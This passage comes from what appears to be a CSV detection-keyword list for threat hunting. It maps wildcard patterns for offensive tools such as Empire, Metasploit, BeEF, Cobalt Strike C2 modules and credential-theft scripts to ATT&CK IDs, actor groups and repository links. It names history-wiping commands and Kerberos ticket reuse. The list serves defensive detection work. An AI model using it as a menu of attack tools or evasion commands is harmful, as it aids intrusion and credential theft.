While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-Jenkins*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-Jenkins.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-Jenkins.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JMXConsole*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*exploits*_csrf/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploits*_csrf/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploits/*_macro*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploits/CVE-*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploit-suggester*,offensive_tool_keyword,Windows-Exploit-Suggester,This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins,T1199 - T1082 - T1210,TA0006 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/AonCyberLabs/Windows-Exploit-Suggester,1,1,N/A,N/A,10,3712,1016,2023-05-11T12:44:55Z,2014-07-08T13:16:28Z -*ExploitTest.cpp*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*ExploitTest.vcxproj*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*export HISTFILE=/dev/null*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*export HISTFILESIZE=0*,greyware_tool_keyword,bash,Clear command 
history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*export HISTFILESIZE=0*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*export HISTFILESIZE=0*,greyware_tool_keyword,export,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*export HISTSIZE=0*,greyware_tool_keyword,export,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*export KRB5CCNAME=*.ccache*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,0,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*export KRB5CCNAME=/*/impacket/administrator.ccache* ,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Export-PowerViewCSV*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Export-PowerViewCSV*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*exports --dll *.dll --prototypes ./Assets/prototypes.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*exposed_get_password*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*exrienz/DirtyCow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,1,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z -*extensions/sniffer*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*external_c2.cna*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.dll*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2.Net*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*ExternalC2.Net.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*externalc2.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*ExternalC2\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*externalc2_start*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Core*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2-master*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Tests*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*ExternalC2Web*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*external-nse-script-library*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*ExternalRecon.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*extract_cmd_exec*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*extract_cmd_exec*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*extract_reflective_loader*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ExtractBitLockerKeys*@podalirius_*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,0,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys.ps1*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to 
automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys.py*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractBitlockerKeys-main*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*ExtractDataXML_BruteForce*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*extracttgsrepfrompcap.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*extra-scripts*timecrack.py*,offensive_tool_keyword,Timeroast,Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID,T1558.003 - T1059.003 - T1078.004,TA0006 - TA0002 - 
